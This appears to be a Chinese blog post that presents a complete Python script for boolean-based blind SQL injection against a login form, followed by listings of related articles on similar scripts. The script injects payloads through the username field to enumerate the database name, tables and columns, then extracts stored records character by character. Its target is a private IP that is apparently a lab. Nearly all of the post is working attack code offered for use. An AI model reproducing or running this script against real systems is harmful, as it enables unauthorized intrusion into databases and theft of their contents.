布尔盲注爆破脚本

于 2025-03-12 21:36:14 发布
阅读量100 收藏
点赞数 2
文章标签: 数据库 oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_88743143/article/details/146215734
版权 
import requests


def ascii_str():
    """生成可显示字符列表"""
    return [chr(i) for i in range(33, 127)]  # 所有可显示字符


def db_length(url, str):
    """测试数据库名长度"""
    print("[-] 开始测试数据库名长度.......")
    num = 1
    while True:
        db_payload = {
            "username": f"admin' and (length(database()) = {num})#",
            "password": "123456"
        }
        r = requests.post(url=url, data=db_payload)
        if str in r.text:
            print(f"[+] 数据库长度:{num}\n")
            db_name(url, str, num)  # 进行下一步,测试库名
            break
        else:
            num += 1


def db_name(url, str, db_length):
    """测试数据库名"""
    print("[-] 开始测试数据库名.......")
    db_name = ''
    str_list = ascii_str()
    for i in range(1, db_length + 1):
        for char in str_list:
            db_payload = {
                "username": f"admin' and (ord(mid(database(), {i}, 1)) = {ord(char)})#",
                "password": "123456"
            }
            r = requests.post(url=url, data=db_payload)
            if str in r.text:
                db_name += char
                break
    print(f"[+] 数据库名:{db_name}\n")
    tb_piece(url, str, db_name)  # 进行下一步,测试表数量


def tb_piece(url, str, db_name):
    """测试数据库中有多少张表"""
    print(f"[-] 开始测试 {db_name} 数据库有几张表........")
    for i in range(100):  # 猜解库中有多少张表,合理范围即可
        tb_payload = {
            "username": f"admin' and {i} = (select count(table_name) from information_schema.tables where table_schema = '{db_name}')#",
            "password": "123456"
        }
        r = requests.post(url=url, data=tb_payload)
        if str in r.text:
            print(f"[+] {db_name} 库一共有 {i} 张表\n")
            tb_name(url, str, db_name, i)  # 进行下一步,猜解表名
            break


def tb_name(url, str, db_name, tb_piece):
    """猜解表名"""
    print("[-] 开始猜解表名.......")
    table_list = []
    for i in range(tb_piece):
        str_list = ascii_str()
        tb_name = ''
        for j in range(1, 20):  # 表名长度,合理范围即可
            tb_payload = {
                "username": f"admin' and (select length(table_name) from information_schema.tables where table_schema = '{db_name}' limit {i}, 1) = {j}#",
                "password": "123456"
            }
            r = requests.post(url=url, data=tb_payload)
            if str in r.text:
                for k in range(1, j + 1):  # 根据表名长度进行截取对比
                    for char in str_list:
                        tb_payload = {
                            "username": f"admin' and (select ord(mid((select table_name from information_schema.tables where table_schema = '{db_name}' limit {i}, 1), {k}, 1))) = {ord(char)}#",
                            "password": "123456"
                        }
                        r = requests.post(url=url, data=tb_payload)
                        if str in r.text:
                            tb_name += char
                            break
                table_list.append(tb_name)
                print(f"[+] 表名:{tb_name}")
                break
    print(f"\n[+] {db_name} 库下的表:{table_list}\n")
    column_num(url, str, table_list, db_name)  # 进行下一步,猜解每张表的字段数


def column_num(url, str, table_list, db_name):
    """猜解每张表的字段数"""
    print("[-] 开始猜解每张表的字段数:.......")
    column_num_list = []
    for table in table_list:
        for j in range(30):  # 每张表的字段数量,合理范围即可
            column_payload = {
                "username": f"admin' and {j} = (select count(column_name) from information_schema.columns where table_name = '{table}')#",
                "password": "123456"
            }
            r = requests.post(url=url, data=column_payload)
            if str in r.text:
                column_num_list.append(j)
                print(f"[+] {table} 表有 {j} 个字段")
                break
    print(f"\n[+] 表对应的字段数:{column_num_list}\n")
    column_name(url, str, table_list, column_num_list, db_name)  # 进行下一步,猜解每张表的字段名


def column_name(url, str, table_list, column_num_list, db_name):
    """猜解每张表的字段名"""
    print("[-] 开始猜解每张表的字段名.......")
    column_name_list = []
    str_list = ascii_str()

    for idx, table in enumerate(table_list):  # idx 是表的索引
        print(f"[+] {table} 表的字段:")
        for i in range(column_num_list[idx]):  # i 表示每张表的字段数量
            column_name = ''
            for j in range(1, 21):  # j 表示每个字段的长度
                column_name_length = {
                    "username": f"admin' and {j - 1} = (select length(column_name) from information_schema.columns where table_name = '{table}' limit {i}, 1)#",
                    "password": "123456"
                }
                r = requests.post(url=url, data=column_name_length)
                if str in r.text:
                    for x in range(1,j + 1):
                        for k in str_list:  # k 表示我们猜解的字符字典
                            column_payload = {
                                "username": f"admin' and ord(mid((select column_name from information_schema.columns where table_name = '{table}' limit {i}, 1), {x}, 1)) = {ord(k)}#",
                                "password": "123456"
                            }
                            r = requests.post(url=url, data=column_payload)
                            if str in r.text:
                                column_name += k
                                break
                    break   # 字段名猜解完成,跳出长度循环
            print(f"[+] {column_name}")
            column_name_list.append(column_name)
    dump_data(url, str, table_list, column_name_list, db_name)  # 进行最后一步,输出指定字段的数据


def dump_data(url, str, table_list, column_name_list, db_name):
    """爆破指定表中的数据"""
    print(f"\n[-] 对 {table_list[0]} 表的 {column_name_list[0:2]} 字段进行爆破.......\n")
    str_list = ascii_str()
    for column in column_name_list[0:2]:
        for j in range(101):  # j 表示有多少条数据,合理范围即可
            data_num_payload = {
                "username": f"admin' and (select count({column}) from {db_name}.{table_list[0]}) = {j}#",
                "password": "123456"
            }
            r = requests.post(url=url, data=data_num_payload)
            if str in r.text:
                data_num = j
                break
        print(f"\n[+] {table_list[0]} 表中的 {column} 字段有以下 {data_num} 条数据:")
        for k in range(data_num):
            dump_data = ''
            for l in range(1, 51):  # l 表示每条数据的长度,合理范围即可
                data_len_payload = {
                    "username": f"admin' and ascii(substr((select {column} from {db_name}.{table_list[0]} limit {k}, 1), {l}, 1))#",
                    "password": "123456"
                }
                r = requests.post(url=url, data=data_len_payload)
                if str not in r.text:
                    for x in range(1, l + 1):  # x 表示每条数据的实际范围
                        for y in str_list:
                            data_payload = {
                                "username": f"admin' and ord(mid((select {column} from {db_name}.{table_list[0]} limit {k}, 1), {x}, 1)) = {ord(y)}#",
                                "password": "123456"
                            }
                            r = requests.post(url=url, data=data_payload)
                            if str in r.text:
                                dump_data += y
                                break
                    break
            print(f"[+] {dump_data}")  # 输出每条数据


if __name__ == '__main__':
    url = "http://172.16.17.201:50143/login.php"  # 目标URL
    str = "你进来干嘛???"  # 布尔型盲注的true&false的判断因素
    db_length(url, str)  # 程序入口

[NCTF2019]SQLi 1 详解 以及 regexp 布尔盲注爆破脚本深度解析与改进
weixin_47623063的博客
09-27 960
regxp bool注入;dirmap目录扫描;bool爆破脚本;[NCTF2019]SQLi 1
SQL注-实战布尔盲注
dkxkl1314的博客
03-09 3325
环境:win10靶场:sqli-labs-master注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能 回显到前端页面。此时,我们需要利用一些方法进行判断或者尝 试,这个过程称之为注。而布尔盲注就是SQL语句执行后,页面 不返回具体数据,数据库只返回0或者1(真or假)。类似于无法开口说话的人,只能通过点头和摇头来告诉你答案的正 确与否。在页面中,如果正确执行了用户构造的SQL语句,则返回一种页 面,如果 SQL语句执行错误,则执行另一种页面。
布尔盲注python脚本.zip
12-28
GET和POST型python脚本
Bool注脚
Forever_Han13的博客
01-21 715
import requests chars = "qwertyuiopasdfghjklzxcvbnm0123456789}{" url = "http://localhost/sqli-labs-kali2-master/Less-15/" for x in range(0, 10): table_name = "" for y in range(1, 20): for char in chars: payload = {
写一个布尔盲注脚本
weixin_35752645的博客
01-01 580
布尔盲注是一种数据库攻击技术,其目的是通过查询数据库并猜测结果来确定特定信息。布尔盲注的基本原理是,通过提交查询并猜测其真假,从而获取有关数据库中存储的信息的提示。 如果要写一个布尔盲注脚本,你需要以下步骤: 建立与数据库的连接。 编写 SQL 语句,并将其提交给数据库。 处理数据库的响应。如果响应为真,则可以推断出查询的条件是真的;如果响应为假,则可以推断出查询的条件是假的。 根据获得的信息,...
python布尔盲注脚本
kiihuang的博客
03-28 583
使用python,编写一个可以自动爆破布尔盲注脚本,根据不同情况调整里面的Content-Length的值。
Python 安全开发 布尔盲注脚本
YouthBelief的博客
12-03 1321
python开发-批量fofa+poc验证0x00 思路0x01 脚本编写1.fofa爬取步骤一:请求搜索地址 以 GlassFish 任意文件读取 为例 0x00 思路 要想批量验证漏洞是否存在需要考虑的点: 1.获取可能存在漏洞的地址信息。 1.1可借助fofa获取目标 影响版本是 <= 4.1.1 fofa指纹 "GlassFish" && port="4848" && country="CN" 或者 "GlassFish" && port
sql-libs第八关 布尔盲注脚本
weixin_74062643的博客
11-28 367
第一次练习写脚本的记录,还可以使用二分查找改进速度。注入语句逻辑写在注释里了。但是目前没精力改进了。这里一直爆到列名结束。
墨者学院-SQL注入漏洞测试(布尔盲注
weixin_42939822的博客
03-20 4455
决心按部就班、由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路。本题靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目。废话不多说啦,先附上题目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
使用Burpsuite进行半自动注入 布尔盲注和时间注 个人总结
代码审计
03-26 4321
利用前提 , 页面上没有显示位 , 也没有输出 $ QL 语句执行错误信息 。 正确的 SQL 语句和错误的 SQL 语句返回页面都 0 样 , . 但是加入 s 丨 p ( 5 ) 条件之 后 , 页面的返回速度明显慢了 5 秒 。 优点 . 不需要显示位 , 不需要出错信息 。 速度慢 , . 耗费大量时间 。 payload: and if(length(database())=8,sleep(10),1) --+ 判断当前数据库库名的长度 如果数据库库名长度大于等于8,则mysql查询休眠10
布尔盲注(ctfhub)
2401_82985722的博客
03-27 2171
页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实行SQL注入。在注入语句后,注不是返回查询到的结果,而只是返回查询是否成功。?id=1' and 1=1--+ 真页面true?id=1' and 1=2--+ 假页面false# substr(database(),1,1):表示从数据库的第1个字母开始,显示1个字母,从1开始计数# limit 0,1:表示从第0行开始,显示1行,从0开始计数一、手动注入一般顺序:爆数据库名长度。
sqli-labs_less8布尔盲注脚本
qq_62989306的博客
01-28 4870
import requests import string url='http://127.0.0.1/sqli/Less-8/' i=0 db_name_len=0 print('[+]正在猜解数据库长度......') while True: payload=url+"?id=1'and length(database())=%d--+"%i res=requests.get(payload) #print(payload) if 'You are in.......
SQL-LABS GET型布尔盲注脚本(node)
AaronLuo
09-03 392
原理 基于SQL-LABS LESS-5,LESS-8 GET型布尔注入,(布尔盲注详解),,基于MSQL 布尔盲注,主要是判断ascii码值是否与猜测的值相同,通过判断页面变化,确定ascii值 由于0-z的ascii值是48-122,256 = 2 ^ 0 + 2 ^ 1 + 2 ^ 2 + 2 ^ 3 + 2 ^ 4 +2 ^ 5 + 2 ^ 6 + 2^ 7 ,通过按位与运算8次,结果相加...
Python自动化sql注入:布尔盲注
qq_46145027的博客
04-22 5367
在sql注入时,使用python脚本可以大大提高注入效率,这里演示一下编写python脚本实现布尔盲注的基本流程:演示靶场:sqli-labs。
Python自动化sql注入:布尔盲注_布尔盲注脚本
2401_83739411的博客
04-07 1275
学好 Python 不论是就业还是做副业赚钱都不错,但要学会 Python 还是要有一个学习规划。最后大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
Python自动化sql注入:布尔盲注_布尔盲注脚本(1)
2401_83739411的博客
04-07 963
这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。print(“数据库名长度为:”+str(l))print(“开始获取数据库名长度…
python脚本实现布尔盲注
04-28 1137
相信师傅们在平常渗透测试中,偶尔会遇到布尔盲注的情况,但是手工的话太慢,上sqlmap流量又太大,特征太明显。所以用python脚本就是最优解,可以自定义user-agent等字段,注入速度等。
【Python】测试布尔注脚
weixin_30457881的博客
11-16 380
sqli-labs第八关:单引号布尔注,手工测出database长度,个人觉得手工比较快 然后使用脚本测database内容,这个脚本就比手工快多了,脚本内容如下: 1 import sys 2 import requests 3 4 url="http://127.0.0.1/sqli-labs-master/Less-8/?id=1%s" 5 payload="...
时间注,布尔盲注脚本
星星的博客
07-01 466
sql
sql注入之布尔盲注Less-8 py
最新发布
12-31
对于`Less-8`环境下的布尔盲注实验,可以采用Python脚本来实现自动化爆破过程。 #### 攻击端代码实例 下面是一个用于演示目的的小型Python程序片段,该程序旨在展示如何基于给定条件判断目标网站是否存在潜在的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值